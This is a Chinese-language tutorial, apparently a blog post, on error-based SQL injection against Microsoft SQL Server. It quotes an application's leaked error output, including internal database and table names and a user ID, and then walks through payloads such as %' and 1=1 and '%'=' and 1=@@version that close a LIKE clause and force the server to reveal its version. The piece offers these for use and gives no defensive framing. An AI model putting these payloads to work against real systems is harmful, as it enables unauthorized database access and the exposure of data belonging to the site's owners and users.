利用永真条件来实现sql注入方法
Q:遇到报错的sql注入,怎么办?
1、首先,先把部分语句给copy下来:
SELECT @Total=COUNT(1) FROM (select * from (select *, ISNULL((select MAX(FOperateTime) from EAWP_Administration..TB_XZSQ_ProcInsOperateRecord where FInactivateDate is null and FOperateNO='50237414' and FProcInsID =a.FProcInsID),a.FLastUpdateDate) as ArrivedDate from EAWP_Administration..TB_XZSQ_Apply a where FInactivateDate is null and (FProcStatus=2 or FProcStatus=4) and FCreateBy='50237414') l where 1=1 AND FFormSubTitle LIKE '%B'%') T SELECT * FROM ( SELECT ROW_NUMBER() OVER (ORDER BY FProcStatus ASC,FCreationDate DESC) AS RowNumber,* FROM ( select * from (select *, ISNULL((select MAX(FOperateTime) from EAWP_Administration..TB_XZSQ_ProcInsOperateRecord where FInactivateDate is null and FOperateNO='50237414' and FProcInsID =a.FProcInsID),a.FLastUpdateDate) as ArrivedDate from EAWP_Administration..TB_XZSQ_Apply a where FInactivateDate is null and (FProcStatus=2 or FProcStatus=4) and FCreateBy='50237414') l where 1=1 AND FFormSubTitle LIKE '%B'%' ) AS N ) AS A WHERE A.RowNumber BETWEEN 1 AND 8 at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady) at System.Data.SqlClient.SqlDataReader.TryConsumeMetaData() at System.Data.SqlClient.SqlDataReader.get_MetaData() at System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString) at 。。。。。。(后面很有很长的sql语句)
2、面对复杂的语句,如何下手? 可以把上面的语句简化,容易分析
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%B'%') 。。。。。。(后面还有很多就不管了)
好了,下面开始研究如何注入。
利用永真条件来实现sql注入方法:
(如果不使用永真条件进行判断的话,使用 ' and 1=@@version+-- 那么很复杂的语句的话,会破坏掉整个sql语句的逻辑,导致执行sql查询失败,最终也无法得到版本)
1、如果遇到很复杂的语句怎么办? 那么我们就把复杂的语句简化为下面这条语句,以免乱军心:
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%B%')
2、插入语句: %' and 1=1 and '%'=' 可以让语句拼接正常,而不会报错
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%%' and 1=1 and '%'='%')
3、开始搞事情:把 1=1 改为 1=@@version 就会把“真”变成“假”,那么数据库将会报错,就会爆出数据库版本
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%%' and 1=@@version and '%'='%')